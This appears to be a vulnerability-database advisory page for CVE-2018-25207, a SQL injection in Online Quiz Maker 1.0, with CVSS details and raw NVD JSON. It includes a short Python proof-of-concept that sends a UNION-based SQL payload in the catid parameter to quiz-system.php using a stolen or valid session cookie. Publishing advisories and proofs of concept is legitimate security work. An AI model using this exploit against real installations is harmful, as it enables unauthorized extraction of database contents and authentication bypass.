Security Vulnerability Report
中文
CVE-2018-25207 CVSS 7.1 HIGH

CVE-2018-25207

Published: 2026-03-26 12:16:06
Last Modified: 2026-05-01 14:34:28
Source: [email protected]

Description

Online Quiz Maker 1.0 contains SQL injection vulnerabilities in the catid and usern parameters that allow authenticated attackers to execute arbitrary SQL commands. Attackers can submit malicious POST requests to quiz-system.php or add-category.php with crafted SQL payloads in POST parameters to extract sensitive database information or bypass authentication.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Online Quiz Maker 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def exploit_sql_injection(target_url, session_cookie): """ PoC for CVE-2018-25207 SQL Injection in Online Quiz Maker Vulnerable parameters: catid, usern """ headers = { "Cookie": f"PHPSESSID={session_cookie}", "Content-Type": "application/x-www-form-urlencoded" } # Payload to extract database version using UNION based SQL injection # Assuming the query has 3 columns based on common structures in such apps payload = "1' UNION SELECT 1, version(), 3-- -" data = { "catid": payload, "submit": "submit" } try: # Targeting the vulnerable endpoint mentioned in description response = requests.post(f"{target_url}/quiz-system.php", data=data, headers=headers) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Check response for database version output.") print(response.text[:200]) # Print snippet of response else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": # Example usage target = "http://example.com" # Requires a valid authenticated session (Low Privilege) sid = "valid_session_id_here" exploit_sql_injection(target, sid)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2018-25207", "sourceIdentifier": "[email protected]", "published": "2026-03-26T12:16:05.847", "lastModified": "2026-05-01T14:34:28.400", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Online Quiz Maker 1.0 contains SQL injection vulnerabilities in the catid and usern parameters that allow authenticated attackers to execute arbitrary SQL commands. Attackers can submit malicious POST requests to quiz-system.php or add-category.php with crafted SQL payloads in POST parameters to extract sensitive database information or bypass authentication."}, {"lang": "es", "value": "Online Quiz Maker 1.0 contiene vulnerabilidades de inyección SQL en los parámetros catid y usern que permiten a atacantes autenticados ejecutar comandos SQL arbitrarios. Los atacantes pueden enviar solicitudes POST maliciosas a quiz-system.php o add-category.php con cargas útiles SQL manipuladas en los parámetros POST para extraer información sensible de la base de datos o eludir la autenticación."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/45323", "source": "[email protected]"}, {"url": "https://www.hscripts.com/scripts/php/downloads/quiz-maker.zip", "source": "[email protected]"}, {"url": "https://www.hscripts.com/scripts/php/quiz-maker.php", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/online-quiz-maker-sql-injection-via-catid-parameter", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.